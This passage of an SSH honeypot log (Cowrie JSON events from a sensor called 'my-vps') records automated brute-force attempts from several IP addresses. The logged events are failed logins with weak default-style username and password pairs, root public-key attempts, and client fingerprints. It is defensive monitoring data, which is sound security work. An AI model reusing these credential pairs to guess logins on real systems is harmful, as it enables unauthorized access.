0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:18:59.693240Z","src_ip":"83.168.105.65","session":"f5912d5113b6"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:18:59.805357Z","src_ip":"83.168.105.65","session":"f5912d5113b6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:00.844855Z","src_ip":"83.168.105.65","session":"f5912d5113b6"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34606,"dst_ip":"1.2.3.4","dst_port":22,"session":"51600f66b911","protocol":"ssh","message":"New connection: 196.251.86.249:34606 (1.2.3.4:22) [session: 51600f66b911]","sensor":"my-vps","timestamp":"2025-08-26T12:19:06.796085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:19:07.466375Z","src_ip":"196.251.86.249","session":"51600f66b911"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:19:07.467180Z","src_ip":"196.251.86.249","session":"51600f66b911"}
{"eventid":"cowrie.login.failed","username":"test","password":"passwd","message":"login attempt [test/passwd] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:09.969303Z","src_ip":"196.251.86.249","session":"51600f66b911"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:11.425736Z","src_ip":"196.251.86.249","session":"51600f66b911"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37962,"dst_ip":"1.2.3.4","dst_port":22,"session":"49a42dadbc5d","protocol":"ssh","message":"New connection: 212.227.235.229:37962 (1.2.3.4:22) [session: 49a42dadbc5d]","sensor":"my-vps","timestamp":"2025-08-26T12:19:14.323523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:19:14.583124Z","src_ip":"212.227.235.229","session":"49a42dadbc5d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:19:14.583858Z","src_ip":"212.227.235.229","session":"49a42dadbc5d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34414,"dst_ip":"1.2.3.4","dst_port":22,"session":"575fd8d2da66","protocol":"ssh","message":"New connection: 83.168.105.65:34414 (1.2.3.4:22) [session: 575fd8d2da66]","sensor":"my-vps","timestamp":"2025-08-26T12:19:15.069014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:19:15.069918Z","src_ip":"83.168.105.65","session":"575fd8d2da66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:19:15.110227Z","src_ip":"83.168.105.65","session":"575fd8d2da66"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:15.232680Z","src_ip":"83.168.105.65","session":"575fd8d2da66"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:16.274739Z","src_ip":"83.168.105.65","session":"575fd8d2da66"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"111111","message":"login attempt [ubuntu/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:16.366333Z","src_ip":"212.227.235.229","session":"49a42dadbc5d"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:17.905973Z","src_ip":"212.227.235.229","session":"49a42dadbc5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40316,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d86838c050c","protocol":"ssh","message":"New connection: 212.227.235.229:40316 (1.2.3.4:22) [session: 2d86838c050c]","sensor":"my-vps","timestamp":"2025-08-26T12:19:26.322149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:26.323251Z","src_ip":"212.227.235.229","session":"2d86838c050c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:26.529171Z","src_ip":"212.227.235.229","session":"2d86838c050c"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:27.193928Z","src_ip":"212.227.235.229","session":"2d86838c050c"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:27.194909Z","src_ip":"212.227.235.229","session":"2d86838c050c"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMtPQsyaqw+aw2IVa/8L11Jo5cY+yQs6PVsZ52P1EsjCUO1W6i4Ck/VnmYZQNf7HphdMkf/5vhwy5XE9gLWlLJBT30KQZzaZvHWfy7Bnpy5EMgeFIqGhYy/4H7r33MPKTzhlmezdn7AlipkrP8Kb/l5NBWLLB1ZNa8TTYI9T1tYRzm+gW1+uVpNuz6WYf+iY7ZcTqlivARqQLBbwK4CoXiWDe395gXJHySnH+Tri5g8LU+M+mnWaRVfieJ0F1+/niQ7e4Vdp4Fo+fxHWTx6+wElYK7GFKytI1cMlOTZTU3DB84de8dLVynaxCv7BzwaFkPL+Ar5sx9LoCHRU0WCi6czVdOg3OaxUrkxP0S/t79AhVaIAsR+I5IvStVI8SIlUQL9RlaKcvqje2z9etRxHYNM8TDUivjcHHGPQOSJROG0VPUMNAHR5EJAZKbMq7DLpXsO8+4nvGQJMuNuMWcU8MMTcLJwfKEQyHaJYXRKq8v8FkJHuL7wi5wxx4E1UFRSGc=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","sensor":"my-vps","timestamp":"2025-08-26T12:19:27.491795Z","src_ip":"212.227.235.229","session":"2d86838c050c"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMtPQsyaqw+aw2IVa/8L11Jo5cY+yQs6PVsZ52P1EsjCUO1W6i4Ck/VnmYZQNf7HphdMkf/5vhwy5XE9gLWlLJBT30KQZzaZvHWfy7Bnpy5EMgeFIqGhYy/4H7r33MPKTzhlmezdn7AlipkrP8Kb/l5NBWLLB1ZNa8TTYI9T1tYRzm+gW1+uVpNuz6WYf+iY7ZcTqlivARqQLBbwK4CoXiWDe395gXJHySnH+Tri5g8LU+M+mnWaRVfieJ0F1+/niQ7e4Vdp4Fo+fxHWTx6+wElYK7GFKytI1cMlOTZTU3DB84de8dLVynaxCv7BzwaFkPL+Ar5sx9LoCHRU0WCi6czVdOg3OaxUrkxP0S/t79AhVaIAsR+I5IvStVI8SIlUQL9RlaKcvqje2z9etRxHYNM8TDUivjcHHGPQOSJROG0VPUMNAHR5EJAZKbMq7DLpXsO8+4nvGQJMuNuMWcU8MMTcLJwfKEQyHaJYXRKq8v8FkJHuL7wi5wxx4E1UFRSGc=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:27.492412Z","src_ip":"212.227.235.229","session":"2d86838c050c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:27.698730Z","src_ip":"212.227.235.229","session":"2d86838c050c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50220,"dst_ip":"1.2.3.4","dst_port":22,"session":"59389bed3dba","protocol":"ssh","message":"New connection: 212.227.235.229:50220 (1.2.3.4:22) [session: 59389bed3dba]","sensor":"my-vps","timestamp":"2025-08-26T12:19:27.903785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:27.904709Z","src_ip":"212.227.235.229","session":"59389bed3dba"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:28.110655Z","src_ip":"212.227.235.229","session":"59389bed3dba"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:28.524884Z","src_ip":"212.227.235.229","session":"59389bed3dba"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:28.525538Z","src_ip":"212.227.235.229","session":"59389bed3dba"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","sensor":"my-vps","timestamp":"2025-08-26T12:19:28.732781Z","src_ip":"212.227.235.229","session":"59389bed3dba"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:28.733462Z","src_ip":"212.227.235.229","session":"59389bed3dba"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:28.940288Z","src_ip":"212.227.235.229","session":"59389bed3dba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50242,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c33489a5933","protocol":"ssh","message":"New connection: 212.227.235.229:50242 (1.2.3.4:22) [session: 7c33489a5933]","sensor":"my-vps","timestamp":"2025-08-26T12:19:29.146362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:29.147599Z","src_ip":"212.227.235.229","session":"7c33489a5933"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:29.353054Z","src_ip":"212.227.235.229","session":"7c33489a5933"}
